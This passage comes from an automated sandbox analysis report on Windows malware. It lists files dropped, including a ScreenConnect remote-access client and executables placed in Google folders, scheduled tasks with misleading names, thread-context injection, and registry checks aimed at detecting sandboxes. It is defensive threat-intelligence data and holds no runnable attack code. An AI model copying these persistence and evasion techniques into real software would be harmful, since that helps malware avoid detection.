description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log ScreenConnect.WindowsClient.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\System32\Tasks\MS Build Tools svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\Tasks\Discord svchost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (73a0227d089fe193)\mpadsw5f.tmp ScreenConnect.ClientService.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 svchost.exe File opened for modification C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCPS svchost.exe File opened for modification C:\Windows\System32\Tasks\DOS Monitor Task svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 OfficeClickToRun.exe File opened for modification C:\Windows\system32\Microsoft\Protect\S-1-5-18\User\251bf85c-3ec0-454c-9afb-74e7e5cd6170 lsass.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.chk DllHost.exe File opened for modification C:\Windows\System32\Tasks\DOS Monitor svchost.exe File opened for modification C:\Windows\system32\Microsoft\Protect\S-1-5-18\User\Preferred lsass.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (73a0227d089fe193)\mpadsw5f.newcfg ScreenConnect.ClientService.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\Microsoft\Protect\S-1-5-18\User\Diagnostic.log lsass.exe File opened for modification C:\Windows\System32\Tasks\Java Update(32bit) svchost.exe File opened for modification C:\Windows\System32\Tasks\svhost svchost.exe -
Enumerates processes with tasklist 1 TTPs 8 IoCs
pid Process 12880 tasklist.exe 7432 tasklist.exe 13340 tasklist.exe 12168 tasklist.exe 8404 tasklist.exe 1972 tasklist.exe 6612 tasklist.exe 9076 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 7784 _ovvtLvn.exe 9600 mokajotabet.exe -
Suspicious use of SetThreadContext 9 IoCs
description pid Process procid_target PID 4528 set thread context of 4832 4528 DevMI.exe 115 PID 5792 set thread context of 2832 5792 updaters.exe 138 PID 5792 set thread context of 5664 5792 updaters.exe 157 PID 5792 set thread context of 5480 5792 updaters.exe 158 PID 12496 set thread context of 7472 12496 ffcr.exe 287 PID 7900 set thread context of 14188 7900 Muikfjd.exe 318 PID 12144 set thread context of 14292 12144 Proxifier.exe 321 PID 14928 set thread context of 10896 14928 inst.exe 340 PID 9600 set thread context of 6660 9600 mokajotabet.exe 341 -
Drops file in Program Files directory 20 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\DOS Monitor\dosmon.exe discord.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.Core.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.Windows.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.WindowsCredentialProvider.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.ClientService.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\app.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\Client.en-US.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\Client.Override.en-US.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\Client.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\system.config msiexec.exe File created C:\Program Files\Google\Libs\WR64.sys updaters.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.Client.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.WindowsBackstageShell.exe msiexec.exe File created C:\Program Files\Google\Chrome\updaters.exe DevMI.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.WindowsBackstageShell.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.WindowsClient.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.WindowsClient.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\Client.Override.resources msiexec.exe File created C:\Program Files (x86)\DOS Monitor\dosmon.exe discord.exe File created C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.ClientService.dll msiexec.exe -
Drops file in Windows directory 17 IoCs
description ioc Process File created C:\Windows\Installer\e5a5595.msi msiexec.exe File created C:\Windows\Installer\{B2815872-1382-4EA9-A2C5-3C3AC63DD73D}\DefaultIcon msiexec.exe File opened for modification C:\Windows\Installer\{B2815872-1382-4EA9-A2C5-3C3AC63DD73D}\DefaultIcon msiexec.exe File opened for modification C:\Windows\Installer\e5a5593.msi msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\SystemTemp\~DF13DB72D6BA193FA4.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI5AE5.tmp msiexec.exe File created C:\Windows\Installer\wix{B2815872-1382-4EA9-A2C5-3C3AC63DD73D}.SchedServiceConfig.rmi MsiExec.exe File created C:\Windows\SystemTemp\~DFC787D04406C6036F.TMP msiexec.exe File created C:\Windows\Installer\e5a5593.msi msiexec.exe File created C:\Windows\Installer\SourceHash{B2815872-1382-4EA9-A2C5-3C3AC63DD73D} msiexec.exe File created C:\Windows\SystemTemp\~DF0C2AD35CFBC5DED8.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI5804.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI5844.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF13BEC0D746EA0D08.TMP msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3088 sc.exe 1404 sc.exe 200 sc.exe 1316 sc.exe 3988 sc.exe 5000 sc.exe 3576 sc.exe 4552 sc.exe 2976 sc.exe 5168 sc.exe -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
pid Process 8860 mshta.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x0004000000000695-25592.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 13 IoCs
pid pid_target Process procid_target 6896 11768 WerFault.exe 557 14644 6828 WerFault.exe 561 5416 6416 WerFault.exe 568 6440 9348 WerFault.exe 564 9272 6264 WerFault.exe 578 15160 11756 WerFault.exe 582 6716 11528 WerFault.exe 584 1004 14584 WerFault.exe 590 11432 892 WerFault.exe 593 9340 8484 WerFault.exe 602 1740 6812 WerFault.exe 599 7744 5680 WerFault.exe 603 7444 7948 WerFault.exe 514 -
System Location Discovery: System Language Discovery 1 TTPs 36 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Proxifier.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CPDB.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language invoice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Muikfjd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language File.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Muikfjd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mokajotabet.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vbc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Discord2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cHSzTDjVl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Discord.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _ovvtLvn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language discord.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winX32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winX32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cjrimgid.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ScreenConnect.ClientService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ffcr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 18 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 14484 cmd.exe 14516 PING.EXE 2484 PING.EXE 8340 PING.EXE 6236 PING.EXE 2244 PING.EXE 7000 PING.EXE 12712 PING.EXE 2492 PING.EXE 11624 PING.EXE 14512 PING.EXE 13724 PING.EXE 12976 PING.EXE 12776 PING.EXE 9692 PING.EXE 11312 PING.EXE 6436 PING.EXE 7320 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000485242783223abf50000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000485242780000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff00000000070001000068090048524278000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d48524278000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000004852427800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\CompatibleIDs svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe -
Checks processor information in registry 2 TTPs 20 IoCs
Processor information is often read in order to detect sandboxing environments.
